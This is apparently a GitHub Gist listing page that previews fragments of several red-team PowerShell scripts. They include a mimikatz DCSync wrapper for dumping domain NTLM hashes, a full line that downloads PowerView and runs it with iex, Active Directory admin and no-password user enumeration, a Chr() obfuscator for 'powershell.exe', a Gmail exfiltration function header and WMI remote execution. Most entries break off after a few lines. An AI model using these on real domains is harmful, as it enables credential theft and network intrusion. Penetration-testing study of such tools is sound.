This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Download and invoke PowerView: | |
iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | |
# All admin users of default domain: | |
$filename = 'admins_default_domain'; $out = Get-NetUser -AdminCount; Export-Clixml $filename'.out' -InputObject $out; "All admins in the domain. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt' | |
# All enabled users (including admins) with no-password setting | |
$filename = 'users_no_password_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all. Count: $($out.count) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var to_chr = "powershell.exe"; | |
var return_string = ""; | |
var chars_max_return = 60; | |
for (var x=0, len=to_chr.length; x<len; x++) { | |
return_string += 'Chr('+to_chr[x].charCodeAt(0)+') & '; | |
if ((x > 0) && ((x % chars_max_return) == 0)) { console.log(return_string.substr(0,return_string.length - 3)); return_string = ""; } | |
} | |
console.log(return_string.substr(0,return_string.length - 3)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Do-GmailExfiltration | |
{ | |
[CmdletBinding()] | |
param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)] | |
[String] | |
$Data, | |
[Parameter(Position = 1, Mandatory = $True)] | |
[String] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-ExcelTransposing { | |
[CmdletBinding()] | |
[OutputType([psobject])] | |
param( | |
[Parameter(Mandatory=$true, ValueFromPipelineByPropertyName=$true)] | |
[string] $FileName, | |
[Parameter(Mandatory=$false, ValueFromPipelineByPropertyName=$true)] | |
[string] $SheetName='Sheet1' | |
) |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-WinMI | |
{ | |
[CmdletBinding(DefaultParameterSetName="Command")] | |
Param( | |
[Parameter(Position = 0)] | |
[String[]] | |
$ComputerName, | |
[Parameter(ParameterSetName = "CustomCommand", Position = 1)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# | |
# PowerShell script to retrieve a list of all Domain Controllers on a domain, including also the StartTime (last reboot) of each DC. | |
# Useful: | |
# - For determine which server could be affected for a non-patched vulnerability. | |
# - For determine which server could have more credentials in its memory. | |
# ### | |
# No admin privilege required to run this script. | |
# PowerShell version 2 is required. | |
# ### |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# | |
# PowerShell script to retrieve the StartTime (last reboot) of given computers. | |
# Useful: | |
# - For determine which server could be affected for a non-patched vulnerability. | |
# - For determine which server could have more credentials in its memory. | |
# ### | |
# No admin privilege required to run this script. | |
# PowerShell version 2 is required. | |
# ### |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-NetworkStatistics { | |
<# | |
.SYNOPSIS | |
Display current TCP/IP connections for local or remote system | |
.FUNCTIONALITY | |
Computers | |
.DESCRIPTION | |
Display current TCP/IP connections for local or remote system. Includes the process ID (PID) and process name for each connection. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Deprecated. | |
# Usage: | |
# nmap 'grepeable' scan: nmap -oG outputfile.txt --open google.com | |
# when scan finishes, run: | |
# Get-Content outputfile.txt | Convert-NmapOutput | |
# | |
function Convert-NmapOutput { | |
[CmdletBinding()] | |
[OutputType([psobject])] |
OlderNewer